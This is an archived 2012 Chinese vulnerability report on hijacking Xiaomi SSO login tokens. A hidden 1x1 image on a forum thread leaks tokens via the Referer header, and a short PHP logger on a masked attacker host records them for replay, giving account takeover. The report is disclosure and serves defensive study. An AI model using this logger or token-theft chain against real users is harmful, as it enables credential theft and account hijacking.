| 漏洞标题 | 小米的TOKEN仍可被劫持 |
|---|---|
| 相关厂商 | 小米科技 |
| 漏洞作者 | zhk |
| 提交时间 | 2012-07-22 03:02 |
| 公开时间 | 2012-09-05 03:03 |
| 漏洞类型 | 敏感信息泄露 |
| 危害等级 | 高 |
| 自评Rank | 20 |
| 漏洞状态 | 厂商已经确认 |
| Tags标签 | sso实现漏洞,用户认证信息泄漏 |
漏洞详情
我首先发了个帖子:http://bbs.xiaomi.cn/thread-4229174-1-1.html
里面有张图片(宽和高都是1,所以一般看不到),图片地址指向一个网站:http://www.****.com/logtoken.php#1.jpg
然后我到处散播这个地址http://passport.xiaomi.com/index.php?appid=2&goto=http://bbs.xiaomi.cn/thread-4229174-1-1.html
只要用户从那个地址登录后就会转到http://bbs.xiaomi.cn/thread-4229174-1-1.html?token=WVK%2B***************************************
然后这个URL就会被记录到http://www.****.com/token.txt
最后就可以获取TOKEN从http://bbs.xiaomi.cn/extra.php?mod=xiaomi/authcallback&token=WVK%2B***************************************登录了
code 区域
logtoken.php
<?php
$fp=fopen("token.txt","a+") or exit("Unable to open file!");
$text="/nIP:".$_SERVER['SERVER_ADDR']."----REFERER:".$_SERVER['HTTP_REFERER']."/n";
fwrite($fp,$text);
fclose($fp);
echo $text;
?>
漏洞证明:
刚开始发现记录的IP全是182.50.148.128,还以为行不通了,不过最后证明地址不是我的,TOKEN也不一样,为了证明,我就多进几个帐号
登陆地址:http://passport.xiaomi.com/index.php?appid=2&goto=http://bbs.xiaomi.cn/thread-4229174-1-1.html
入口:http://bbs.xiaomi.cn/extra.php?mod=xiaomi/authcallback&token=******************
修复方案:
TOKEN内加上别的认证信息OR其它
搞个gitee的项目
![[HBLOG]公众号](https://www.liuhaihua.cn/img/qrcode_gzh.jpg)
